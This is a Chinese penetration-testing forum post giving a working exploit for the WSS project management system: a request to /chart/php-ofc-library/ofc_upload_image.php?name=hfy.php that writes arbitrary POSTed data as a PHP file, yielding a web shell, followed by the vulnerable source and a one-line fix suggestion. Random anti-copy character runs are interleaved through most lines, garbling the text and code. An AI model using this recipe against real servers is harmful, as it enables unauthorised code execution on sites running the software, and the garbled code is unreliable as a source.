中国网络渗透测试联盟

标题: WSS项目管理系统Post get shell [打印本页]
作者: admin    时间: 2013-2-23 12:38
标题: WSS项目管理系统Post get shell
POST 数据漏洞文件执行任意后缀文件保存: g/ G, ^) G4 h
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
% Q! \1 y# R* }# ?
& F' I% x; z; w" C4 H利用:# _& e' p, Y8 F( F5 o1 f+ E1 i
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
, a: T7 E# }% k8 |% _* M2 `) ?2 p( ~! ^) w8 x) K3 D2 I! p/ @4 G8 ~- b
Post任意数据
6 Q0 L! O* |3 b. c: `; O保存位置http://localhost/chart/tmp-upload-images/hfy.php
% f  g. K3 j' v[attach]201[/attach]- v# Q* z( t% f% o$ t+ u! g; e
[attach]202[/attach]+ u  F3 [+ _5 ~( H2 Q
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
# d! T- {+ K8 I  Q2 Q1 J5 J
, p+ z5 Z1 R& i<?php# @0 {, ^4 K! ]: \8 ?

# J( [. V  j4 O7 C% \0 K( d//: _* J/ y" U7 g0 S- v1 `
// In Open Flash Chart -> save_image debug mode, you. m6 c, f+ `* f" Y: h8 J: D
// will see the 'echo' text in a new window.3 }+ N( F; K* h* q- J
//
" W: o. h3 A, }0 B9 n' Q. a% u: m( _) q- L% n. T4 ^
/*
. {9 z6 {+ K; }9 }( w$ Y/ @& d4 _3 T: {, m
print_r( $_GET );
$ u: H" Y  d+ E+ B  J8 Nprint_r( $_POST );
1 k3 ]- F$ S' G7 j' O- v  m9 Kprint_r( $_FILES );, z: z8 y- m/ ?* R
, V8 Y; T3 U/ v$ A) g5 B3 P" P
print_r( $GLOBALS );
# U  q1 p+ J8 nprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
, K) ]9 j4 @8 _" l; M; n( t) T" E) r: D5 i
*/
' p) Q* `, r# {- u' L: J// default path for the image to be stored //
% B+ _5 `9 v2 d; g" C9 Y5 M* S$default_path = '../tmp-upload-images/';
  x" D' G) M" f" h% |  b+ @1 H5 o2 w6 `$ ]) m/ K7 R
if (!file_exists($default_path)) mkdir($default_path, 0777, true);9 x- b7 G- Q+ b
" V0 ]; d) I% J6 l9 H
// full path to the saved image including filename //
( V/ ^) M2 f6 ~* ?: W$destination = $default_path . basename( $_GET[ 'name' ] ); 2 J7 v. h# o0 O
7 D! o' u, Z; J& f3 n3 \
echo 'Saving your image to: '. $destination;
$ {$ g+ p: V/ I5 r// print_r( $_POST );3 [/ u8 n% N# B* }4 c
// print_r( $_SERVER );6 V* O9 A% G5 Z% P/ o4 d
// echo $HTTP_RAW_POST_DATA;) e1 [& |: e( a" z/ u# y, |

' q. E/ g% e' w+ A0 R//! |- t5 j5 p2 {, o) Z/ P$ B
// POST data is usually string data, but we are passing a RAW .png
* s+ o# y- _8 l: K5 i// so PHP is a bit confused and $_POST is empty. But it has saved
* |% X' b5 g- l3 ]/ Z// the raw bits into $HTTP_RAW_POST_DATA0 G0 \% Q" M$ K* H: ]( Y
//
! }1 K4 E( |- y- m5 k  n  A
6 M- V  u: [, Q1 k6 A3 [$jfh = fopen($destination, 'w') or die("can't open file");
, H1 v. }( e. W, f, X. S6 c& lfwrite($jfh, $HTTP_RAW_POST_DATA);
- a: B8 _% Y6 w% Xfclose($jfh);
& J! q$ `) ~/ ~$ W2 n5 p6 A1 H9 x& U9 j  Q: U% T0 Q
//! g5 j5 V* i; B0 M& [
// LOOK:
+ l; `8 ]% T  ]9 _. }//
7 t4 @/ p5 B6 Y4 N# Cexit();
1 _. t9 L, B+ o# V) }4 z" O//0 F% y  G, I1 N0 b6 C3 M
// PHP5:! }6 E" D% Z6 A' a5 R5 Q2 d. P# T5 ]6 c, o
//
) ^1 s, y1 ^* ^0 m3 \% O! H. [7 }; ^' s

) k5 n; v. }7 h) U" @- @// default path for the image to be stored //
% }8 v6 Z& s, e2 I$default_path = 'tmp-upload-images/';
/ f/ U( m* |9 Q" W% C+ A
9 j1 x) f1 J7 L8 Eif (!file_exists($default_path)) mkdir($default_path, 0777, true);4 Q( Z5 ~7 }; E- _/ Z
3 ?; n4 U2 ^3 t2 P1 M& i; Z1 H
// full path to the saved image including filename //
' L0 b  R- w* o5 o2 w6 [9 u5 v$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); ! A! {2 z0 f6 C3 X" |6 K2 B

5 j: A1 I3 l( R1 x; K# N" X0 E// move the image into the specified directory //
) ^6 E' a2 N; ^; _if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
; H. y5 r' w' R( I' j) F. E' `+ m    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";9 p7 I2 z/ c) I/ E6 K( K, m9 Q" F; P
} else {" P, s) m% U; w9 V0 d+ G
    echo "FILE UPLOAD FAILED";: k. A& ], W# D  Q0 V- C4 S+ s
}+ D" w: @" |& J6 i
2 |& Z' u% u/ o+ P+ m

% y- D$ m: ]) t: z' M  m! p?>  V  `0 Y; L/ a! U* \8 n2 N  _

/ h1 [( q# K. `4 e1 z! |
- L; {, M2 x9 s. \$ ]: G  z# O0 J: @! ^7 l) _
5 x- X' B4 J2 B/ W+ R# |) u
[attach]203[/attach]
$ ~0 J) q! L4 |/ s5 U* X2 ?) @9 B: x
修复方案: # q* ?# _1 e2 y: o
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 ! f8 B. J& r# P0 r5 M! v' w
: j/ F1 g' |- a8 S4 ?9 f4 s" M
- D; H; M7 v- U: t8 f; Y
* H) s7 M1 c# ~3 E' {. T! S6 m9 D3 u5 F

+ g" N, s' B. p& v4 F& ~9 k# R



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2